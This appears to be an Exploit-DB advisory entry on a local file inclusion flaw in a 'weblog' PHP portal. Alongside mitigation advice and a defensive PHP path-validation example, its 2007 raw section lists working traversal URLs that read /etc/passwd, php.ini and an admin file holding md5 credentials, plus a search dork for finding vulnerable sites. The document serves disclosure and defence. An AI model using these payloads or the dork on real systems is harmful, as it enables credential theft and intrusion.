vendor:
by: Dj7xpl
CVSS: 5.5 (MEDIUM)
Local File Inclusion
CWE: 98
Product Name:
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown

Local File Inclusion Exploit

This exploit allows an attacker to include local files on the target system by manipulating the 'file' parameter in the URL. By specifying a relative path to a sensitive file, such as the PHP configuration file or the password file, the attacker can view the contents of these files.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate file paths before including them in the code. Additionally, access controls should be implemented to restrict unauthorized access to sensitive files.
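
One way to implement the path validation recommended above, as an added example that is not the weblog's own code. The article directory, the `.txt` extension, the name pattern and the function name `resolve_article()` are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical location of the content the 'file' parameter may select.
const ARTICLE_DIR = __DIR__ . '/articles';

/**
 * Map the user-supplied 'file' value to a path inside $baseDir.
 * Returns null when the value is not acceptable or the file is missing.
 */
function resolve_article(string $name, string $baseDir = ARTICLE_DIR): ?string
{
    // 1. Allowlist the name: letters, digits, '_' and '-' only. This rejects
    //    '/', '\', '.', NUL bytes and stream wrappers such as php://,
    //    so values like ../../../../etc/passwd or ../admin.php never pass.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name) !== 1) {
        return null;
    }

    // 2. Canonicalise both paths. realpath() resolves symlinks and '..'
    //    and returns false when the target does not exist.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.txt');
    if ($base === false || $path === false) {
        return null;
    }

    // 3. Containment check: the resolved path must still sit under the base
    //    directory (catches a symlink inside it that points elsewhere).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// 'file' can arrive as an array (file[]=x); accept strings only.
$raw  = $_GET['file'] ?? '';
$path = is_string($raw) ? resolve_article($raw) : null;
if ($path === null) {
    http_response_code(404);
    exit('Article not found');
}
// Assumption: articles are plain text, so they are read and escaped as data
// rather than passed to include().
echo htmlspecialchars((string) file_get_contents($path), ENT_QUOTES, 'UTF-8');
```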

Exploit-DB raw data:

+_______________________________________________Iranian Are The Best In World___________________________________________+
#
#
#   Portal     :   weblog
#   Download   :   http://www.holtstraeter.com/cybercheffe/pages/websoft.php?action=websoft_page_five
#   Author     :   Dj7xpl  | Dj7xpl@yahoo.com
#   Dork       :   "(C) by CyberTeddy"
#   Class      :   Local File Inclusion Exploit
#
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
#
#
#   Exploit :   http://[target]/[path]/index.php?show=showarticles&file=[local-file]
#
#   Example :   http://localhost/blog/index.php?show=showarticles&file=../../../../windows/php.ini
#               http://localhost/blog/index.php?show=showarticles&file=../../../../etc/passwd
#               http://localhost/blog/index.php?show=showarticles&file=../admin.php   <<< username&password(md5)        
#    
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#    Sp Tnx      :  Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh .............
#
#
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-03-15]